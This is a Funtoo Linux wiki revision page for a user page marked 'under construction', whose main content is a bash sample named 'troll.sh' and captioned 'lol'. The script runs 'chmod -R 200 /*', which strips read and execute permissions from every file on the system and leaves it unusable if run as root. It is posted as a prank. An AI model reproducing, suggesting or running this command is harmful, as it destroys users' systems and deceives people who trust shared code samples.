Note
The Funtoo Linux project has transitioned to "Hobby Mode" and this wiki is now read-only.
Difference between revisions of "User:Court-jester"
Jump to navigation
Jump to search
Court-jester (talk | contribs) (Created page with "== Page under construction == Ignore this page! === Code samples === {{file|name=troll.sh|lang=bash|desc=lol|body= #!/bin/bash # Will this break anything? chmod -R 200 /* }}") |
Court-jester (talk | contribs) |
||
(2 intermediate revisions by 2 users not shown) | |||
Line 9: | Line 9: | ||
chmod -R 200 /* | chmod -R 200 /* | ||
}} | }} | ||
[[User:Court-jester/Ebuild 101|Ebuild 101]] |
Latest revision as of 19:56, February 25, 2022
Page under construction
Ignore this page!
Code samples
troll.sh
(bash source code) - lol#!/bin/bash
# Will this break anything?
chmod -R 200 /*